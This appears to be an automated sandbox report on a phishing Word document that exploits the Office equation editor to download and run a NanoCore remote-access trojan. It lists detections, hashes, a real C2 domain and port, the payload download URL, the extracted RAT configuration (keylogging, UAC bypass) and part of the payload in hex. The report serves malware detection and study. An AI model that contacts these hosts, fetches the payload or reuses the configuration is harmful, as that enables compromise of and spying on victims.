Analysis Report NEW ORDER Ref PO-298721.doc

Overview

General Information

Sample Name: NEW ORDER Ref PO-298721.doc
Analysis ID: 431710
MD5: f343ce75606d600a978f4593ad92a5ed
SHA1: 0aca94dd295f12f4deb4505a3f3dd470a7a59752
SHA256: 194abfeb6f78221b43aff1da8d0aceead6282979840d9aa43bfc20d190ba0ddd
Tags: doc
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Nanocore RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "f9198f9a-66a7-4bba-ab1c-dff8091c", "Group": "Default", "Domain1": "tzitziklishop.ddns.net", "Domain2": "tzitziklishop.ddns.net", "Port": 1665, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "", "BackupDNSServer": "37.235.1.177", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
Multi AV Scanner detection for domain / URL
Source: carbinz.gq Virustotal: Detection: 15% Perma Link
Source: tzitziklishop.ddns.net Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\cat464923.exe ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: NEW ORDER Ref PO-298721.doc Virustotal: Detection: 23% Perma Link
Source: NEW ORDER Ref PO-298721.doc ReversingLabs: Detection: 34%
Yara detected Nanocore RAT
Source: Yara match File source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Source: Yara match File source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\cat464923.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 18.0.smtpsvc.exe.400000.4.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.0.smtpsvc.exe.400000.2.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.0.smtpsvc.exe.400000.4.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.2.cat464923.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.2.cat464923.exe.400000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 16.0.cat464923.exe.400000.1.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.0.cat464923.exe.400000.1.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.0.cat464923.exe.400000.3.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.2.smtpsvc.exe.400000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 18.0.smtpsvc.exe.400000.2.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.2.cat464923.exe.4a0000.5.unpack Avira: Label: TR/NanoCore.fadte
Source: 18.2.smtpsvc.exe.400000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 5.0.cat464923.exe.400000.3.unpack Avira: Label: TR/Dropper.MSIL.Gen7

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cat464923.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cat464923.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: symbols\dll\System.pdb source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: j,C:\Windows\System.pdb@#P source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\geNROzYNTy\src\obj\Debug\grlL.pdb source: smtpsvc.exe
Source: Binary string: .pdbD source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: grlL.pdb0 source: cat464923.exe, 00000005.00000002.2347577380.000000000055D000.00000004.00000020.sdmp

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: carbinz.gq
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 103.133.106.117:1665
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49181 -> 103.133.106.117:1665
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: tzitziklishop.ddns.net
Uses dynamic DNS services
Source: unknown DNS query: name: tzitziklishop.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 103.133.106.117:1665
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 09 Jun 2021 05:47:55 GMTContent-Type: application/x-msdownloadContent-Length: 736256Last-Modified: Tue, 08 Jun 2021 16:00:42 GMTConnection: keep-aliveETag: "60bf942a-b3c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bb 6a bf 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 32 0b 00 00 08 00 00 00 00 00 00 c2 51 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 51 0b 00 4f 00 00 00 00 60 0b 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 38 50 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c8 31 0b 00 00 20 00 00 00 32 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 60 0b 00 00 06 00 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 51 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 ab 01 00 08 cd 00 00 03 00 00 00 6b 00 00 06 b0 78 02 00 88 d7 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 02 72 01 00 00 70 7d 01 00 00 04 02 14 7d 02 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 2a 00 13 30 04 00 3f 01 00 00 01 00 00 11 00 02 7b 11 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 5c 02 7b 0d 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 45 02 7b 10 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 2e 02 7b 0f 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 17 02 7b 0e 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2b 01 17 13 04 11 04 2c 11 00 72 5d 00 00 70 28 17 00 00 0a 26 38 b2 00 00 00 02 7b 01 00 00 04 73 18 00 00 0a 0a 1f 0b 8d 3d 00 00 01 25 16 72 79 00 00 70 a2 25 17 02 7b 11 00 00 04 6f 15 00 00 0a a2 25 18 72 10 01 00 70 a2 25 19 02 7b 10 00 00 04 6f 15 00 00 0a a2 25 1a 72 10 01 00 70 a2 25 1b 02 7b 0e 00 00 04 6f 15 00 00 0a a2 25 1c 72 10 01 00 70 a2 25 1d 02 7b 0f 00 00 04 6f 15 00 00 0a a2 25 1e 72 10 01 00 70 a2 25 1f 09 02 7b 0d 00 00 04 6f 15 00 00 0a a2 25 1f 0a 72
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.239.243.112 185.239.243.112
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /modex/catx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gqConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.177
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.177
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: unknown UDP traffic detected without corresponding DNS query: 37.235.1.174
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4C37CD3-97C0-4A14-814E-1968BCE52029}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /modex/catx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gqConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: carbinz.gq
Source: cat464923.exe, 00000005.00000002.2352132844.0000000005800000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347261747.0000000001CB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: cat464923.exe, 00000005.00000002.2352132844.0000000005800000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347261747.0000000001CB0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a raw input device (often for capturing keystrokes)
Source: cat464923.exe, 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

barindex
Yara detected Nanocore RAT
Source: Yara match File source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY
